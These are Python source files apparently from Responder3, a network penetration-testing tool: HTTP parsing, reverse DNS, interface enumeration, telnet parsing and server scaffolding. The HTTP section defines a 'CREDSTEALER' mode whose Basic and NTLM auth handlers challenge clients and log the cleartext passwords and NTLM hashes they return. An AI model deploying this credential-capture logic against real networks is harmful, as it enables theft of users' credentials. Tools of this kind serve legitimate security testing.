	@staticmethod
	def from_request(req):
		p = HTTPRequestProps()
		for key in req.headers:
			if key.lower() == 'content-encoding':
				# TODO: THIS DOESNT TAKE MULTIPLE-TYPE COMPRESSION INTO ACCOUNT AND WILL FAIL!
				p.content_encoding = HTTPContentEncoding[req.headers[key].upper()]
			elif key.lower() == 'content-length':
				p.content_length = int(req.headers[key])

			elif key.lower() == 'connection':
				try:
					p.connection = HTTPConnection(req.headers[key].lower())
				except:
					p.connection = HTTPConnection.KEEP_ALIVE
		return p


class HTTPRequest:
	def __init__(self):
		self.method  = None
		self.uri     = None
		self.version = None
		self.headers = collections.OrderedDict()
		self.body    = None

		# helper variables
		self.header_key_lookup_table = {}
		self.props = None

	def construct(method, uri, headers, body = None, version = HTTPVersion.HTTP11):
		req = HTTPRequest()
		req.method = method
		req.uri = uri
		req.version = version
		req.headers = headers
		req.body = body # this will be bytes!
		req.props = HTTPRequestProps.from_request(req)
		return req

	def get_header(self, key):
		"""
		Function to map canonized header names (all lower) to the original header key values as they were recieved
		:param key: header key to lookup
		:return: header value or None
		"""
		if key.lower() not in self.header_key_lookup_table:
			return None
		original_key = self.header_key_lookup_table[key.lower()]
		return self.headers[original_key]

	def update_header(self, key, value):
		if key.lower() not in self.header_key_lookup_table:
			self.headers[key] = value
		else:
			self.headers[self.header_key_lookup_table[key.lower()]] = value
		self.props = HTTPRequestProps.from_request(self)

	def remove_header(self, key):
		if key.lower() not in self.header_key_lookup_table:
			return
		original_key = self.header_key_lookup_table[key.lower()]
		if original_key is None:
			return
		del self.headers[original_key]
		del self.header_key_lookup_table[key.lower()]
		return

	def to_bytes(self):
		if self.props is None:
			self.props = HTTPRequestProps.from_request(self)

		if self.props.content_length is None:
			self.update_header('Content-Length', 0)

		t_body = self.body
		if self.body is not None:
			if self.props.content_encoding is not None:
				t_body = compress_body(self)
			else:
				t_body = self.body
			self.update_header('Content-Length', int(len(t_body)))

		t = '%s %s %s%s' % (self.method, self.uri, self.version.value, '\r\n')
		for hdr in self.headers:
			t += '%s: %s\r\n' % (hdr, self.headers[hdr])

		t += '\r\n'
		t = t.encode('ascii')
		# now to deal with the body
		if self.body is not None:
			t += t_body
		return t

	@staticmethod
	async def from_streamreader(reader, timeout = None):
		req = HTTPRequest()
		firstline = await readline_or_exc(reader, timeout = timeout)
		try:
			req.method, req.uri, t = firstline.decode('ascii').strip().split(' ')
			req.version = HTTPVersion(t.upper())
		except Exception as e:
			raise e

		hdrs = await readuntil_or_exc(reader, b'\r\n\r\n', timeout = timeout)
		hdrs = hdrs[:-4].decode('ascii').split('\r\n')
		for hdr in hdrs:
			marker = hdr.find(': ')
			key   = hdr[:marker]
			value = hdr[marker+2:]
			req.header_key_lookup_table[key.lower()] = key
			req.headers[key] = value

		req.props = HTTPRequestProps.from_request(req)

		if req.props.content_length is None or req.props.content_length == 0:
			return req

		else:
			req.body = await read_or_exc(reader, req.props.content_length, timeout = timeout)
			if req.props.content_encoding is not None:
				decompress_body(req, modify_internal=True)
		return req

	@staticmethod
	def from_bytes(bbuff):
		pass
		# TODO: whn everything looks nice, implement buffer parsing
		# HTTPRequest.from_buffer(io.BytesIO(bbuff))

	def __repr__(self):
		t  = '== HTTP Request ==\r\n'
		t += 'FIRST  : %s\r\n' %' '.join([self.method, self.uri, self.version.value])
		t += 'HEADERS: %s\r\n' % repr(self.headers)
		t += 'BODY   : \r\n %s\r\n' % repr(self.body)
		return t


class HTTPResponse:
	def __init__(self):
		self.version = None
		self.code    = None
		self.reason  = None
		self.body    = None
		self.headers = collections.OrderedDict()

		# helper variables
		self.header_key_lookup_table = {}
		self.props = None

	def get_header(self, key):
		"""
		Function to map canonized header names (all lower) to the original header key values as they were recieved
		:param key: header key to lookup
		:return: header value or None
		"""
		if key.lower() not in self.header_key_lookup_table:
			return None
		original_key = self.header_key_lookup_table[key.lower()]
		return self.headers[original_key]

	def update_header(self, key, value):
		if key.lower() not in self.header_key_lookup_table:
			self.headers[key] = value
		else:
			self.headers[self.header_key_lookup_table[key.lower()]] = value
		self.props = HTTPRequestProps.from_request(self)

	@staticmethod
	async def from_streamreader(reader, timeout = None):
		resp = HTTPResponse()
		t = await readuntil_or_exc(reader, b' ', timeout = timeout)
		resp.version = HTTPVersion(t.decode().upper().strip())
		t = await readuntil_or_exc(reader, b' ', timeout = timeout)
		resp.code = int(t.decode().strip())
		t = await readline_or_exc(reader, timeout = timeout)
		resp.reason = t.decode().strip()

		hdrs = await readuntil_or_exc(reader, b'\r\n\r\n', timeout=timeout)
		hdrs = hdrs[:-4].decode('ascii').split('\r\n')
		for hdr in hdrs:
			marker = hdr.find(': ')
			key = hdr[:marker]
			value = hdr[marker + 2:]
			resp.header_key_lookup_table[key.lower()] = key
			resp.headers[key] = value

		resp.props = HTTPRequestProps.from_request(resp)

		if resp.props.content_length is None or resp.props.content_length == 0:
			return resp

		else:
			resp.body = await read_or_exc(reader, resp.props.content_length, timeout=timeout)
			if resp.props.content_encoding is not None:
				decompress_body(resp, modify_internal=True)
		return resp

	@staticmethod
	def from_bytes(bbuff):
		pass
		# TODO: implement buffer parsing when everything looks nice
		# return HTTPResponse.from_buffer(io.BytesIO(bbuff))

	def __repr__(self):
		t  = '== HTTPResponse ==\r\n'
		t += 'version: %s \r\n' % self.version.value
		t += 'code: %s \r\n' % self.code
		t += 'reason: %s \r\n' % self.reason
		t += 'headers: %s \r\n' % self.headers
		t += 'body: %s \r\n' % repr(self.body)
		return t

	def __str__(self):
		return self.__repr__()

	@staticmethod
	def construct(code, body = None, httpversion = HTTPVersion.HTTP11, headers = collections.OrderedDict(), reason = None):
		resp = HTTPResponse()
		resp.version = httpversion
		resp.code    = int(code)
		if reason is None:
			resp.reason = HTTPResponseReasons[code] if code in HTTPResponseReasons else 'Unauthorized'
		else:
			resp.reason = reason
		
		resp.body    = body
		resp.headers = headers

		return resp

	def to_bytes(self):
		if self.props is None:
			self.props = HTTPRequestProps.from_request(self)

		if self.props.content_length is None:
			self.update_header('Content-Length', 0)

		t_body = b''
		if self.body is not None:
			if self.props.content_encoding is not None:
				t_body = compress_body(self)
			else:
				t_body = self.body.encode()
			self.update_header('Content-Length', int(len(t_body)))

		if self.reason is None:
			self.reason = HTTPResponseReasons[self.code] if self.code in HTTPResponseReasons else 'Unauthorized'

		t = '%s %s %s\r\n' % (self.version.value, self.code, self.reason)
		for key, value in self.headers.items():
			if isinstance(value, enum.Enum):
				t += '%s: %s\r\n' % (key, self.headers[key].name.lower())
			else:
				t += '%s: %s\r\n' % (key, self.headers[key])
		t += '\r\n'
		t = t.encode('ascii')
		t += t_body

		return t


class HTTP200Resp(HTTPResponse):
	def __init__(self, body = None, httpversion = HTTPVersion.HTTP11, 
						headers = collections.OrderedDict(), reason = None):
		HTTPResponse.__init__(self)
		self.version = httpversion
		self.code    = '200'
		self.reason  = reason
		self.body    = body
		self.headers = headers


class HTTP301Resp(HTTPResponse):
	def __init__(self,redirectURL, body = None, httpversion = HTTPVersion.HTTP11, 
						headers = collections.OrderedDict(), reason = None):
		HTTPResponse.__init__(self)
		self.version = httpversion
		self.code    = '301'
		self.reason  = reason
		self.body    = body
		self.headers = collections.OrderedDict()
		self.headers['Location'] = redirectURL


class HTTP400Resp(HTTPResponse):
	def __init__(self, body = None, httpversion = HTTPVersion.HTTP11, 
						headers = collections.OrderedDict(), reason = None):
		HTTPResponse.__init__(self)
		self.version = httpversion
		self.code    = '400'
		self.reason  = reason
		self.body    = body
		self.headers = headers


class HTTP401Resp(HTTPResponse):
	def __init__(self, authType,authChallenge = None, body = None, 
						httpversion = HTTPVersion.HTTP11, 
						headers = collections.OrderedDict(), reason = None):
		HTTPResponse.__init__(self)
		self.version = httpversion
		self.code    = '401'
		self.reason  = reason
		self.body    = body
		self.headers = headers

		if authChallenge is not None:
			self.headers['WWW-Authenticate'] = '%s %s' % (authType, authChallenge)
		else:
			self.headers['WWW-Authenticate'] = '%s' % authType


class HTTP403Resp(HTTPResponse):
	def __init__(self, body = None, httpversion = HTTPVersion.HTTP11, 
						headers = collections.OrderedDict(), reason = None):
		HTTPResponse.__init__(self)
		self.version = httpversion
		self.code    = '403'
		self.reason  = reason
		self.body    = body
		self.headers = headers


class HTTP407Resp(HTTPResponse):
	def __init__(self, authType,authChallenge = None, body = None, httpversion = HTTPVersion.HTTP11, 
						headers = collections.OrderedDict(), reason = None):
		HTTPResponse.__init__(self)
		self.version = httpversion
		self.code    = '407'
		self.reason  = reason
		self.body    = body
		self.headers = headers

		if authChallenge is not None:
			self.headers['Proxy-Authenticate'] = '%s %s' % (authType, authChallenge)
		else:
			self.headers['Proxy-Authenticate'] = '%s' % authType


class HTTPServerMode(enum.Enum):
	PROXY = 'PROXY'
	CREDSTEALER = 'CREDSTEALER'


class HTTPBasicAuth:
	"""
	Handling HTTP basic Auth
	verify_creds: can be a  1. dictionary with user:password pairs.
						 2. empty dict means nobody is allowed
						 3. None means EVERYBODY IS ALLOWED
	"""

	def __init__(self, verify_creds = None):
		self._iterations = 0
		self.verify_creds = verify_creds

	async def do_AUTH(self, http_request, http_server):
		try:
			auth_header_key = 'Authorization' if http_server.session.server_mode != HTTPServerMode.PROXY else 'Proxy-Authorization'
			#print('hdr key: %s' % auth_header_key)
			req_auth_header = http_request.get_header(auth_header_key)
			#print('Auth header: %s' % req_auth_header)
			if req_auth_header is not None and req_auth_header[:5].upper() == 'BASIC':
				temp = base64.b64decode(req_auth_header[5:]).decode('ascii')
				marker = temp.find(':')
				if marker == -1:
					http_server.log('Invalid BASIC auth field!')
					return
				user_creds = BASICUserCredentials()
				user_creds.username = temp[:marker]
				user_creds.password = temp[marker+1:]

				await http_server.logger.credential(user_creds.to_credential())

				if user_creds.verify(self.verify_creds):
					http_server.session.current_state = HTTPState.AUTHENTICATED
				else:
					http_server.session.current_state = HTTPState.AUTHFAILED

			else:
				if http_server.session.server_mode == HTTPServerMode.PROXY:
					a = await asyncio.wait_for(http_server.send_data(HTTP407Resp('Basic').to_bytes()), timeout = 1)
				else:
					a = await asyncio.wait_for(http_server.send_data(HTTP401Resp('Basic').to_bytes()), timeout = 1)
				return
		except Exception as e:
			await http_server.loggerexception()


class BASICUserCredentials:
	def __init__(self):
		self.username = None
		self.password = None

	def to_credential(self):
		cred = Credential(
			'Cleartext',
			username = self.username,
			password = self.password,
			fullhash = '%s:%s' % (self.username, self.password)
		)
		return cred

	def verify(self, verify_creds):
		if verify_creds is None:
			return True
		else:
			if self.username in verify_creds:
				return verify_creds[self.username] == self.password
			else:
				return False


class HTTPNTLMAuth:
	def __init__(self, verify_creds = None, ntlm_settings = None):
		self.handler = NTLMAUTHHandler()
		self.handler.setup(ntlm_settings, verify_creds)
		self.verify_creds = verify_creds
		self.ntlm_settings = ntlm_settings

	async def do_AUTH(self, http_request, httpserver):
		try:
			auth_header_key = 'Authorization' if httpserver.session.server_mode != HTTPServerMode.PROXY else 'Proxy-Authorization'
			req_auth_header = http_request.get_header(auth_header_key)
			if req_auth_header is not None and req_auth_header[:4].upper() == 'NTLM':
				auth_status, ntlm_message, creds = self.handler.do_AUTH(base64.b64decode(req_auth_header[5:]))
				if creds is not None:
					for cred in creds:
						await httpserver.logger.credential(cred.to_credential())

				if auth_status == NTStatus.STATUS_MORE_PROCESSING_REQUIRED:
					if httpserver.session.server_mode == HTTPServerMode.PROXY:
						a = await asyncio.wait_for(httpserver.send_data(HTTP407Resp('NTLM '+ base64.b64encode(ntlm_message).decode('ascii')).to_bytes()), timeout =1 )
					else:
						a = await asyncio.wait_for(httpserver.send_data(HTTP401Resp('NTLM '+ base64.b64encode(ntlm_message).decode('ascii')).to_bytes()), timeout =1 )
					return

				elif auth_status == NTStatus.STATUS_ACCOUNT_DISABLED:
					httpserver.session.current_state = HTTPState.AUTHFAILED

				elif auth_status == NTStatus.STATUS_SUCCESS:
					httpserver.session.current_state = HTTPState.AUTHENTICATED

				else:
					raise Exception('Unexpected status')
			else:
				if httpserver.session.server_mode == HTTPServerMode.PROXY:
					a = await asyncio.wait_for(httpserver.send_data(HTTP407Resp('NTLM').to_bytes()), timeout = 1)
				else:
					a = await asyncio.wait_for(httpserver.send_data(HTTP401Resp('NTLM').to_bytes()), timeout = 1)
				return
		except Exception as e:
			await httpserver.logger.exception()



import os
import json
from pathlib import PurePath, Path
import multiprocessing

from responder3.core.responder3 import Responder3, Responder3Config
from responder3.core.commons import Credential


def setup_test(filepath):
	current_path = Path(filepath).resolve()
	test_dir = PurePath(str(current_path.parents[1]))
	globals_file = str(Path(test_dir, 'globals.json'))
	print(globals_file)
	global_config = None
	with open(globals_file, 'r') as f:
		global_config = json.load(f)

	print(global_config)
	test_config = str(Path(PurePath(str(current_path.parents[0])), 'config.py'))

	os.environ["R3CONFIG"] = test_config
	output_queue = multiprocessing.Queue()

	r3config = Responder3Config.from_os_env()
	r3 = Responder3.from_config(
		r3config,
		global_config['interfaces'],
		global_config['ipv4'],
		global_config['ipv6'],
		global_config['verb'],
		output_queue=output_queue
	)
	r3.daemon = True

	return r3, global_config, output_queue


def read_to_creds(output_queue, timeout = 1):
	while True:
		obj = output_queue.get()
		if isinstance(obj, Credential):
			return obj



import ipaddress
from socket import AF_INET, AF_INET6, inet_ntop
from ctypes import (
    Structure, POINTER,
    pointer, cast,
    c_ushort, c_byte, c_uint8, c_void_p, c_char_p, c_uint, c_uint16, c_uint32
)
import ctypes.util
import ctypes

from responder3.core.interfaces.NetworkInterface import NetworkInterface

def get_darwin_ifaddrs():
    """
    Enumerates all network interfaces and all IP addresses assigned for each interfaces both IPv4 and IPv6 on Macintosh host
    :return: list of NetworkInterface
    """

    class struct_sockaddr(Structure):
        _fields_ = [
            ('sa_len', c_uint8),
            ('sa_family', c_uint8),
            ('sa_data', c_byte * 14),]

    class struct_sockaddr_in4(Structure):
        _fields_ = [
            ('sin_len', c_uint8),
            ('sin_family', c_uint8),
            ('sin_port', c_uint16),
            ('sin_addr', c_uint8 * 4),
            ('sin_zero', c_byte * 8),]

    class struct_sockaddr_in6(Structure):
        _fields_ = [
            ('sin_len', c_uint8),
            ('sin_family', c_ushort),
            ('sin_port', c_uint16),
            ('sin_flowinfo', c_uint32),
            ('sin_addr', c_byte * 16),
            ('sin_scope_id', c_uint32)]

    struct_sockaddr_in = {}
    struct_sockaddr_in[AF_INET] = struct_sockaddr_in4
    struct_sockaddr_in[AF_INET6] = struct_sockaddr_in6

    class struct_ifaddrs(Structure):
        pass

    struct_ifaddrs._fields_ = [
        ('ifa_next', POINTER(struct_ifaddrs)),
        ('ifa_name', c_char_p),
        ('ifa_flags', c_uint),
        ('ifa_addr', POINTER(struct_sockaddr)),
        ('ifa_netmask', POINTER(struct_sockaddr)),
        ('ifa_dstaddr', POINTER(struct_sockaddr)),
        ('ifa_data', c_void_p),]

    libc = ctypes.CDLL(ctypes.util.find_library('c'))

    def ifap_iter(ifap):
        ifa = ifap.contents
        while ifa:
            yield ifa
            if not ifa.ifa_next:
                break
            ifa = ifa.ifa_next.contents

    def get_family_and_address(sa):
        family = sa.sa_family
        addr = None
        if family not in [AF_INET, AF_INET6]:
            return family, None
        sa = cast(pointer(sa), POINTER(struct_sockaddr_in[family])).contents
        addr = inet_ntop(family, sa.sin_addr)
        return family, addr

    ifap = POINTER(struct_ifaddrs)()
    libc.getifaddrs(pointer(ifap))
    interfacesd = {}
    try:
        for ifa in ifap_iter(ifap):
            ifname = ifa.ifa_name.decode("UTF-8")
            if ifname not in interfacesd:
                interfacesd[ifname] = NetworkInterface()
                interfacesd[ifname].ifname = ifname
                interfacesd[ifname].ifindex = libc.if_nametoindex(ifname)
            family, addr = get_family_and_address(ifa.ifa_addr.contents)
            if (addr is None):
                del interfacesd[ifname]
                continue
            interfacesd[ifname].addresses.append(ipaddress.ip_address(addr))
        return interfacesd
    finally:
        libc.freeifaddrs(ifap)



from responder3.core.commons import *

def print_packets(filename):
	with open(filename, 'r') as f:
		for line in f:
			line = line.strip()
			pd = ProxyData.fromJSON(line)
			print(str(pd))

if __name__ == '__main__':
	import argparse
	parser = argparse.ArgumentParser(description='Parse the prox log file and print each packet to stdout')
	parser.add_argument('filename', help='full path to the proxy log file')
	args =  parser.parse_args()
	print_packets(args.filename)



#https://tools.ietf.org/html/rfc854
#https://tools.ietf.org/html/rfc861
"""
Foreword: THIS IS NOT THE TELNET PROTOCOL!
Telnet clients nowadays just use a half-assed ASCII based tcp socket,
but telnet is much much more than that!!!!

That being sad, if someone want's to do actual telnet implementation 
I'm willing to buy him a beer or two, if it can do pretty terminals.

Now enjoy this half-assed protocol impelemtation from yours truly!
"""
import enum
import io

from responder3.core.commons import *
from responder3.core.asyncio_helpers import *

class TELNETMessageParser:
	def __init__(self, session):
		self.session = session
		
	async def from_streamreader(self, reader, timeout = 60):
		first = await read_or_exc(reader, 1, timeout = timeout)
		if first[0] == 255:
			#extended options list
			data = await read_or_exc(reader, 26, timeout = timeout)
			return first + data
		else:
			data = await readline_or_exc(reader, timeout = timeout)
			return (first + data[:-2]).decode()


import ipaddress
from responder3.protocols.DNS import *
from responder3.core.udpwrapper import UDPClient
import os

#, resolver_server = '8.8.8.8', resolver_server_6 = '2001:4860:4860::8888'

# TODO: make use of all servers in the list, not just the first one
# TODO: enable IPv6

class RDNS:
	def __init__(self, server, server6):
		self.server = server #list of dict [{'ip':'8.8.8.8', 'port':53, 'proto' : 'udp'}]
		self.server6 = server6 #not used yet #list of dict  [{ 'ip': '2001:4860:4860::8888', 'port':53, 'proto' : 'udp'}]
		
	
	async def resolve(self, ip):
		try:
			ip = ipaddress.ip_address(ip).reverse_pointer
			tid = os.urandom(2)
			question = DNSQuestion.construct(ip, DNSType.PTR, DNSClass.IN, qu = False)
				
						
			if self.server[0]['proto'].upper() == 'TCP':
				packet = DNSPacket.construct(
							TID = tid, 
							flags = DNSFlags.RD,
							response = DNSResponse.REQUEST, 
							opcode = DNSOpcode.QUERY, 
							rcode = DNSResponseCode.NOERR, 
							questions= [question], 
							proto = socket.SOCK_STREAM
						)
				reader, writer = await asyncio.open_connection(self.server[0]['ip'], self.server[0]['port'])
				writer.write(packet.to_bytes())
				await writer.drain()

				data = await DNSPacket.from_streamreader(reader, proto = socket.SOCK_STREAM)
				if data.Rcode == DNSResponseCode.NOERR and len(data.Answers) > 0:
					return str(data.Answers[0].domainname)
				else:
					return 'NA'

				return str(data.Answers[0].domainname)
			else:
				cli = UDPClient((self.server[0]['ip'], self.server[0]['port']))

				packet = DNSPacket.construct(
							TID = tid, 
							flags = DNSFlags.RD,
							response = DNSResponse.REQUEST, 
							opcode = DNSOpcode.QUERY, 
							rcode = DNSResponseCode.NOERR, 
							questions= [question], 
							proto = socket.SOCK_DGRAM
						)
				reader, writer = await cli.run(packet.to_bytes())
				data = await DNSPacket.from_streamreader(reader)
				if data.Rcode == DNSResponseCode.NOERR and len(data.Answers) > 0:
					return str(data.Answers[0].domainname)
				else:
					return 'NA'
		except Exception as e:
			import traceback
			traceback.print_exc()
			return None



import abc
import asyncio
import copy

from responder3.core.commons import *
from responder3.core.logging.logger import *
from responder3.core.udpwrapper import *

class ResponderServerGlobalSession:
	def __init__(self, log_queue, server_name):
		self.logger = Logger(server_name, logQ = log_queue)


class ResponderServerSession(abc.ABC):
	def __init__(self, connection, log_queue, server_name):
		self.connection = connection
		self.logger = Logger(server_name, logQ = log_queue)

class ResponderServer(abc.ABC):
	def __init__(self, server_name, settings, reader, writer, session, log_queue, socket_config, ssl_context, shutdown_evt, rdns_resolver = None,globalsession=None, loop=None):
		self.loop = loop
		if self.loop is None:
			self.loop = asyncio.get_event_loop()

		self.session = session
		self.server_name = '%s[%s]' % (server_name, self.session.connection.get_remote_print_address())
		self.logger = Logger(server_name, logQ = log_queue, connection = self.session.connection)
		
		self.caddr = self.session.connection.get_remote_address()
		self.creader = reader
		self.cwriter = writer
		self.cproto = 'UDP' if isinstance(writer.writer, UDPWriter) else 'TCP'
		self.rdns_resolver = rdns_resolver
		self.listener_socket_config = socket_config
		self.listener_socket_ssl_context = ssl_context
		self.settings = settings
		self.globalsession = globalsession
		self.shutdown_evt = shutdown_evt
		
		self.init()

	def get_default_ssl_ctx(self):
		return get_default_ctx()

	async def switch_ssl(self, ssl_ctx):
		new_transport = await self.cwriter.switch_ssl(ssl_ctx)
		await self.creader.switch_ssl(new_transport)
		return

	@abc.abstractmethod
	def init(self):
		pass

	@abc.abstractmethod
	async def run(self):
		pass
